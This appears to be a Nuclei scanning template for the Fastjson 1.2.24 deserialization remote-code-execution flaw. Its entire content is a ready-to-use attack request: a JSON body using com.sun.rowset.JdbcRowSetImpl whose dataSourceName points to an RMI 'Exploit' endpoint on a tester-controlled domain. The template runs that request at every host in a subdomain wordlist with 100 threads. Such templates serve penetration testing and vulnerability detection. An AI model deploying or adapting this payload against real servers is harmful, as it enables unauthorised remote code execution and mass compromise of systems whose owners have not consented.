id: fastjson-1.2.24-rce 1

info:
  name: Fastjson 1.2.24 Deserialization RCE
  author: zh
  severity: critical
  reference:
    - https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.24-rce
    - https://www.freebuf.com/vuls/208339.html
    - https://github.com/wyzxxz/fastjson_rce_tool
  tags: fastjson,rce,deserialization,oast

requests:
  - payloads:
      Subdomains: /home/mahmoud/Wordlist/AllSubdomains.txt
    attack: sniper
    threads: 100

    raw:
      - |
        POST / HTTP/1.1
        Host: {{Subdomains}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
        Accept-Encoding: gzip, deflate
        Accept: */*
        Content-Type: application/json

        {
            "b":{
                "@type":"com.sun.rowset.JdbcRowSetImpl",
                "dataSourceName":"rmi://{{Host}}.{{Port}}.{{Subdomains}}.fastjson.{{MY-DOMAIN}}/Exploit",
                "autoCommit":true
            }
        }